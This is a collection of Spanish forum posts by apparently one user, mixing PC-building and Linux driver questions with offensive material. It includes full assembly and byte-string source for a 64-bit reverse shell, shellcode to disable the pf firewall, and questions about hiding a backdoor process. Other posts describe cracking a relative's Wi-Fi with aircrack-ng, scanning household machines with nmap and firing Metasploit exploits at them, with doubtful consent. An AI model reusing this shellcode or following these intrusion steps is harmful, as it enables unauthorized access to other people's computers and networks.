Temas

Hola

Pues lo dicho, me gustaría saber los GFLOPs que alcanza un binario.

Solo puedo calcular la velocidad, con kdump.

Un saludo.

Hola

Para poner en practica los conocimientos que voy adquiriendo en ASM, hice una pequeña reverse shell de 64bits.

Esta testeada en OpenBSD y en nivel local, no remoto, solo es para poner en practica mis conocimientos, eso lo dejo bien claro.

Código (asm) [Seleccionar] Expandir

.section .text
.globl _start

_start:

incb %al
pushq %rax
popq %rsi
incb %al
pushq %rax                      //socket
popq %rdi
orb $0x4, %al
pushq %rax
popq %rdx
addb $0x5b, %al
syscall

xchgq %rax, %rdi            //descriptor

movq $0x0100007f4dbc02ff, %rbx        //sockaddr_in
pushq %rbx

movq %rsp, %rsi
movb $0x10, %dl                   //connect
orb $0x60, %al
syscall

xorq %rsi, %rsi

C.0:

movb $0x5a, %al
syscall
incb %sil                             //dup2 0,1,2
cmpb $0x03, %sil

loopne C.0

movq $0x68732f6e69622fff, %rbx
shrq $0x8, %rbx
pushq %rbx
movq %rsp, %rdi
xorb %al, %al                       //execve sh
pushq %rax
movq %rsp, %rsi
xchgq %rax, %rdx
addb $0x2b, %al
syscall

xorb %al, %al     

C:

Código (c) [Seleccionar] Expandir

"\xfe\xc0\x50\x5e\xfe\xc0\x50\x5f\x0c\x04\x50\x5a"
"\x04\x5b\x0f\x05\x48\x97\x48\xbb\xff\x02"
"\xbc\x4d"                  // puerto
"\x7f\x00\x00\x01"         // direccion
"\x53\x48\x89\xe6\xb2\x10\x0c\x60\x0f\x05\x48\x31"
"\xf6\xb0\x5a\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03"
"\xe0\xf3\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68"
"\x48\xc1\xeb\x08\x53\x48\x89\xe7\x30\xc0\x50\x48"
"\x89\xe6\x48\x92\x04\x2b\x0f\x05\x30\xc0";

Cualquier pregrunta sobre el código no os cortéis.

Un saludo.

Hola

Estoy creando una shellcode para que desactive pf, y tengo el siguiente problema.

Código (asm) [Seleccionar] Expandir

.section .text
.globl _start
_start:

pushq %rax
push $0x6c746366
push $0x702f6e69
push $0x62732f2f
movq %rsp, %rdi
pushq %rax
push $0x642d
pushq %rdi
movq %rsp, %rsi
xorq %rax, %rax
movb $0x3b, %al
int $0x80

xorq %rax, %rax
movb $0x01, %al
int $0x80

No presenta ninguna segmentation fault así que la tracé.

Código [Seleccionar] Expandir


11277 l        CALL  execve(0x7f7fffff6960,0x7f7fffff6948,0)
11277 l        NAMI  "//sb"
11277 l        RET   execve -1 errno 2 No such file or directory
11277 l        CALL  exit(0x7f7fffff6960)

Al cargar la dirección de pfctl, solo copia en el registro rdi 0x62732f2f "//sb" no entiendo porque no carga la dirección completa.

Un saludo.

Hola

Cuando creas un socket se guarda en una variable entera que se le llama descriptor, luego ese descriptor se usa para las funciones como connect, bind, revc etc...

Cifrando el descriptor con XOR la conexión funcionaría?

Hay otras formas más "refinadas" de conseguirlo"?

Un saludo.

[muy básica]

Hola

Voy al grano.

Tengo algo parecido a una backdoor, como un netcat, pero es "muy básica".

Cuando miro las conexiones activas hay aparece, y en ps también, la oculto cambiando el nombre por un proceso común, pero es muy cutre no?

Hay una práctica llamada "Hooking" si no me equivoco, pero todo es para windows, alguien puede echarme un cable para un unix-like?

Un saludo.

P.D: Muestro el código si alguien quiere.

Hola

Estoy dando mis primeros pasos con ASM, y me ha surgido este problema.

Código (asm) [Seleccionar] Expandir

.section .data

msg:

.ascii "KPID\n"

.section .text

.globl _start

_start:

movl $4, %eAX
movl $1, %eBX
movl $msg, %eCX
movl $5, %eDX

int $0x80

movl $37, %eAX
movl $1375, %eBX
movl $9, %eCX

int $0x80

xorl %eAX, %eAX

movl $1, %eAX
movl $0, %eBX

int $0x80

Este código lo escribo y ejecutó en una máquina de 32 bits, cuando lo paso a la mía que es de 64 bits.

El resultado es esté:

Código [Seleccionar] Expandir

Bad system call (core dumped)

Leyendo documentación:

rdi - used to pass 1st argument to functions
rsi - used to pass 2nd argument to functions
rdx - used to pass 3rd argument to functions
rcx - used to pass 4th argument to functions
r8 - used to pass 5th argument to functions
r9 - used to pass 6th argument to functions

Dejo el código así:

Código (asm) [Seleccionar] Expandir

.section .data

msg:

.ascii "KPID\n"

.section .text

.globl _start

_start:

movq $4, %rAX
movq $1, %rDI
movq $msg, %rSI
movq $5, %rDX

int $0x80

movq $37, %rAX
movq $1375, %rDI
movq $9, %rSI

int $0x80

xorq %rAX, %rAX
movq $1, %rAX
movq $0, %rBX

int $0x80

La llamada a write funciona, pero a la de kill no, me apaga el sistema.

Utilice otras llamadas simples como mkdir o rmdir, y ninguna funciona en 64 bits pero si en 32 bits.

¿Son los registros o el sistema?

Utilizo OpenBSD.

Un saludo.

Hola

Abro este tema para que me recomienden un buen libro de ensamblador, sistema Unix-like OpenBSD amd64.

E estado mirando esté, que les parece?

Introduction to 64 Bit Intel Assembly Language Programming for Linux.   

Autor: Ray Seyfarth.

Unas muestras del contenido que cede el autor.

Código [Seleccionar] Expandir

http://rayseyfarth.com/asm/pdf/index.html

Un saludo.

Hola

Cuando apago el sistema con un shutdown -h se escucha un "crack" en el HDD,  en mi sistema gentoo no hace "crack" ni ningún tipo de ruido.

HDD: ST3160316AS  Chipsets: AMD SB850, JMicron JMB 362/363

Tengo el HDD en un conector SATA 6GB/s en el chipset AMD SB850.

Un saludo

Hola

Estoy creando un cortafuegos, y me gustaria que hiciera un log de todos los ataques que se hicieran alas DNS, por eso puse a eth1 como la interfaz externa de red, asi es como tengo /etc/conf.d/net

Código [Seleccionar] Expandir

config_eth1="87.216.X.X netmask 255.255.255.0 brd 87.216.1.255
routes_eth1="default gw 87.216.1.1

Pero al poner eso, no puedo hacer ping al exterior, e buscado guias por la red y e consultado en libros de sistemas de redes, y aun no e solucionado mi problema aver si me pueden ayudar.

Un saludo

Hola

Cuando estoy trabajando en la tty, estoy utilizando los drivers genericos "VESA", como podria utilizar el driver fglrx en la tty, como si estuviera en las X?

En el bootsplash el driver se carga correctamente, pero en el lsmod no lo utiliza ningun modulo, esta en 0.



Un saludo.

Hola

Tengo una instalación minima de gentoo, instalo los ati-drivers 11.3 desde emerge, y sigo estas guias.

http://en.gentoo-wiki.com/wiki/Fglrx

http://wiki.cchtml.com/index.php/Gentoo_Installation_Guide

Sigo las guias al pie de la letra, y cuando lanzo fglrxinfo para saber si tengo aceleracion grafica me da el siguiente error

Error: unable to open display (null)

lo mismo con glxinfo

El /etc/modules.autoload.d/kernel-2.6 lo tengo asi, y al arrancar el sistema no tengo ningun error

agpart
ati-agp
fglrx

en lsmod tengo el driver cargado

Module    Size      Used by
fglrx     2790544    0
agpgart  24675      1 fglrx

Si el driver esta en marcha porque no tengo aceleracion grafica, no tengo ningun entorno grafico instalado, las X. Tengo una HD 5870


Un saludo

[Alfa Network AWPCI085H]

Buenas, voy a montarme un equipo wireless y me gustaria que me dieran su opinion y en que podria mejorarlo.

Alfa Network AWPCI085H
http://www.ciudadwireless.com/alfa_network_awpci085h_adaptador_mini_wireless-p-1826.html

Mikrotik IA/MP1 RouterBOARD 11 minipci Adapter
http://www.ciudadwireless.com/mikrotik_ia-mp1_routerboard_minipci_adapter_-optional_with_bracket_rptnc--p-3033.html

Interline INT-PAN-14/24-HV 14dbi ---------------->Pigtail MMCX a N macho
http://www.ciudadwireless.com/interline_int-pan-14-24-hv_antena_planar_14dbi-p-535.html

Un saludo

Buenas

E mirado un buen manual de ocultación de ips con una cadena de proxys, la pena es que era para windows y los programas usados eran SocksChain 3.0 y FlashFXP, cosa que no puede desde ubuntu, los proxys, tienen que ser mios, cuando le das a download en sockschain. que no se tengan que mirar desde una web, nose si me explico bien, pues que herramientas necesito para hacer lo mismo que sockschain pero desde ubuntu?

Un saludo

[AMD Phenom II X6 1055T / 2.8 GHz - Socket AM3]

Buenas, voy a montarme el pc yo con los componentes que e mirado, aver que opinan y me recomiendan, también me faltan algunos componentes que no se cual escoger.

AMD Phenom II X6 1055T / 2.8 GHz - Socket AM3 (211,64€)
http://www.pcgreen.com/productos_detalle.asp?id=138425

ASUS ENGTX275/2DI/896MD3 (229,65€)
http://www.pcgreen.com/productos_detalle.asp?id=142662

Kingston HyperX 4 GB : 2 x 2 GB - DIMM de 240 espigas - DDR3 - 1333 MHz / PC3-10600 - CL9 - 1.6 V (121,39€)
http://www.pcgreen.com/productos_detalle.asp?id=116162

PLACA AMD ASUS M4A89TD PRO AM3 DDR3 PCX ATX (202,57€)
http://www.pcbox.com/catalogo/ficha.asp?lan=es&cnt=es&prec=1&prod=ASK1646

REGRABADORA SONY DVD-R/+RW 5240S 24X SATA (25€)

KIT REFRIGERADOR CORSAIR LIQUIDO INTEL/AMD HYDRO SERIE H50 (81,13€)
http://www.pcbox.com/catalogo/ficha.asp?lan=es&cnt=es&prec=1&prod=COR57

DISCO DURO 750 GB ESCLAVO SATA2 SEAGATE 7200 32MB (93,68€)
http://www.pcbox.com/catalogo/ficha.asp?lan=es&cnt=es&prec=1&prod=SEA283

Bueno aun me kedan algunos componentes como la caja y la fuente de alimentación y el cableado, que me recomiendan, y creo que todo me sale muy caro 968,06€ y algun me kedan unos cuantos componentes, que me recomiendan, tendré que poner componentes peores.

Un saludo

Hola

Voy a comprarme una tarjeta pci y nose cuala escoger, yo e pensado una candidata la SMCWPCIT-G pero no la encuentro solo encuentro la SMCWPCI-G, me recomiendan otra tarjeta? la quiero para auditoras en linux y para navegar, espero sus consejos.

Un saludo

Bueno me voy a comprar un equipo con adaptador y antena, me gustaria saber que opinan de la tarjeta SMCWPCIT-G e visto que tiene el chip atheros 5005GS si no me confundo y las criticas de esta tarjeta por lo que e visto son muy buenas.

Potencia salida

    * 15 DBM MAX (32mW)

Sensiblidad de recepción 802.11b

    * 1MBPS: -86 dBm
    * 2MBPS: -84 dBm
    * 5.5MBPS: -82 dBm
    * 11MBPS: -80 dBm

Sensiblidad de recepción 802.11g

    * 6MBPS: -88 dBm
    * 9MBPS: -87 dBm
    * 12MBPS:-84 dBm
    * 18MBPS: -82 dBm
    * 24MBPS: -79 dBm
    * 36MBPS: -75 dBm
    * 48MBPS: -68 dBm
    * 54MBPS: -68 dBm

Tambien me quiero mirar una antena que me recomiendan una yagi o algo por el estilo y el cableado, aqui tengo un cable pero parace que es un alargador, nose como se llama los conectores, pone algo asi en el cable COAXIAL CABLE PEWC 8D, bueno y la tarjeta la quiero para la auditoria en linux y tambien para navegar.

Un saludo

[PLACA BASE AMD]

Hola

Bueno quiero montarme mi ordenador porque el que tengo tiene ya 6 años, esta obsoleto y falla mucho, esta cascao, e mirado catalogos de tiendas en Barcelona y echo una lista de componentes, la idea era que yo escojo los componentes que quiero para mi ordenador y que lo monten, hay el miedo si esas piezas no son compatibles entre si funcionara mal y el ordenador se rompera, de los dueños de las tiendas no me fio porque hacen lo que sea para vender a noser que sea un buen tio, por eso aver si me pueden ayudar, e pensado en esto aver que opinan

PLACA BASE AMD

M4A79X TD EVO- ATX/ 4DDR3/ DDR3/ 2xPCIe2.0x16-CrossFireX@dualx8/ SATA 3GB

PROCESADOR
AMD PHENOM II QUAD CORE SOCKET AM3 - 4 NUCLEOS

QUAD 955 3.2 GHZ Black Edition/AM3/INBOX

AMD o intel? e mirado en el catalogo los procesadores y las placas base de intel, intel es mas caro, placa base del ¡7 250 euros y la de AMD unos 100 euros, los procesadores el AMD unos 150 euros y los de intel el mas pepino que e visto CORE i7-975 Extreme Edition /3.33Ghz /8MB unos 950 euros, jaja casi 1000 euros el puto procesador, los hay mas baratos pero e mirado los procesadores mas potentes de las 2 casas y esos son uff que diferencia de precio dios, eso que kiere decir que el intel ¡7 le pega cuatro patadas a AMD PHENOM II? de momento me kedo con AMD.

TARJETA GRAFICA
NVIDIA SERIE N PCI-E

GEFORCE GTX260 896MB PCI-E

E mirado tambien las ATI pero como uso linux es mejor las nvidia porque tienen mas soporte.

MEMORIA RAM
KINGSTON

DDR3 4GB 1333MHz - Non-ECC CL9 DIMM (PACK de 2)

DISCO DURO
HDD INTERN 3,5" SEAGATE - SATA

750GB HDD SEAGATE SERIAL-ATA 2 32

FUENTE DE ALIMENTACIÓN

FONT ATX 520W TACENS RADIX III Silenciosa ACTIVE PFC

Nose si esta fuente va poder dar de comer a todo eso, otro problema.

DISIPADOR
ASUS

DISIPADOR CPU ASUS TRITON 75

ADAPTADOR WIRELESS
SMC

SMCWPCIT-G

Nose si el conector de la tarjeta entrara el la placa base, esa tarjeta es un poco vieja, y los conectores de las placas base ahora son mas pequeños, las grabadoras les pondre la de mi pc que funcionan bien, la carcasa del ordenador nose que ponerla.

Total sumando todas la piezas 721 euros.

E mirado tambien en media martk y e visto un HP pavilion ELITE algo asi ponia por unos 1200 euros mas o menos con un ¡7 pero como no dan mucha informacion sobre que tiene el ordenador nose si comprarlo y si las piezas son compatibles con linux.

Gracias y un saludo

Hola

Voy a comprar una tarjeta pci con chip atheros, pero el problema esque dentro de mi casa tengo mala señal, tengo una tarjeta usb con conector RPSMA y antena externa y para cojer buena señal la tengo que sacar al balcon con un cable usb de 5 metros, quiero hacer lo mismo con la pci cojer un cable y sacar la antena al balcon, que cableado y materiales me recomiendan.

Un saludo

Hola

Usando la suite aircrack-ng saque la clave de la red demi tio, me conecto, estoi en el router escaneo con nmap el router y me salen equipos conectados, los resultados de nmap:

Nmap scan report for 192.168.1.32
Host is up (0.0067s latency).
Not shown: 993 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
2869/tcp  open  unknown
5357/tcp  open  unknown
10627/tcp open  unknown
49156/tcp open  unknown
49156/tcp open  unknown

Vale puedo entrar por el puerto 135 que tiene el servicio msrpc con el exploit ms03_026_dcom se puede entrar.
Aki el problema ago un escaneo -O a 192.168.1.32 para saber que sistema operativo tiene, resultados de nmap:

Running: Microsoft Windows 2008|Vista|7
OS details: Microsoft Windows Server 2008 Beta 3, Microsoft Windows Vista SP0 or SP1, Server 2008 SP1, or Windows 7

Uso el exploit ms03_026_dcom y pongo el commando info para saber que hace el exploit:

Description:
  This module exploits a stack overflow in the RPCSS service, this
  vulnerability was originally found by the Last Stage of Delirium
  research group and has been widely exploited ever since. This module
  can exploit the English versions of Windows NT 4.0 SP3-6a, Windows
  2000, Windows XP, and Windows 2003 all in one request

Como dice vale para las versiones  Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003, la maquina tiene Microsoft Windows 2008|Vista|7 no es vulnerable.

Buneo sigo el ataque asta que me toca lanzar el exploit como es de esperar metasploit me dice que me valla ala playa:

[-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied

Acceso denegado, no es vulnerable por que tiene vista o windows 7, hay algun exploit para windows vista|7 para msrcp o alguna otra forma de poder entrar por hay.

Gracias de antemano un saludo.

Hola

Estado mirando por el foro y veo que la gente dice que la alfa 1W es muy buena, nose si comprarla porque tengo esta duda, tengo una WISACOM con el chip RTL8187L, el mismo que la alfa 1W, ubuntu 9.04, como sabreis ubuntu 9.04 tiene los drivers mac 80211 y yo segui este tuto de como cambiarlos por los ieee80211:

http://foro.seguridadwireless.net/zona-linux/parche-para-8187l-en-ubuntu-con-kernel-2-6-28/80/

Quiero la tarjeta para auditoria y para navegar y descargar bien, instale esos drivers, navego bien pero ala hora de usar aircrack-ng tengo este problema con aireplay-ng, cuando meto:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0

me dice aireplay-ng que estoi associado, pero en la captura de airodump-ng no salgo abajo como cliente, y no puedo inyectar con el A3.

Es problema de la wisacom o del driver, la gente dice que le funciona bien, pero si me compro la alfa 1W y me hace la misma pirula seria tirar el dinero, aaa ese problema lo tengo tambien con wifislax osea que seguro que el problema es de wisacom.

E mirado esta alfa de ciudad wireless

http://www.ciudadwireless.com/alfa_network_awus036h_adaptador_wireless_54mbps_802-11b-g_conector_rp-sma-p-1769.html

Poniendo esos drivers a esta alfa me ira todo bien, la compro, espero sus consejos.

Un saludo a todos

Hola
Bien este es mi problema, hice una a puesta con mi tio de que le entraria a su ordenador y tener el control del sistema.Yo uso Linux

Lo primero que ice fue petarle el router con aircrack-ng para poder tener conexion a su red y asi poder entrarle, luego me conecto a traves de dhclient vale pos me conecto y dhclient me dice 1 cosa asi

DHCPACK of 192.168.1.34 from 192.168.1.1

yo entiendo esto decirme si me confundo 192.168.1.34 es mi ip y 192.168.1.1 la suya no?

Ok voy a nmap y ago esto

nmap 192.168.1.1/24

me sale esto mas o menos

PORT   STATE SERVICE
20/tcp open  ftp
23/tcp open  ssh
26/tcp open  telnet
83/tcp open  http
MAC Address: 00:2CXXXXXXXX

Ok y abajo otra cosa q es esto

Interesting ports on 192.168.1.32

PORT     STATE SERVICE
6551/tcp open  bittorrent-tracker
MAC Address: 00:16:XXXXXXXX <-------- otra mac creo q es mi primo q baja con el bittorrent y esta conectado ala red por wifi

Vale creo que ya e encontrado por donde entrar por bittorrent.
ok escaneo la ip  192.168.1.32 esta vez ago esto

nmap -O 192.168.1.32

Para saber q sistema usa on q ya lo sepa
Me pone q es windows xp SP2 O SP3

Ok hasta aki me e kedado que EXPLOIT LE TENGO Q LANZAR Y COMO CON METASPLOIT y si e hecho algo mal.

Gracias un saludo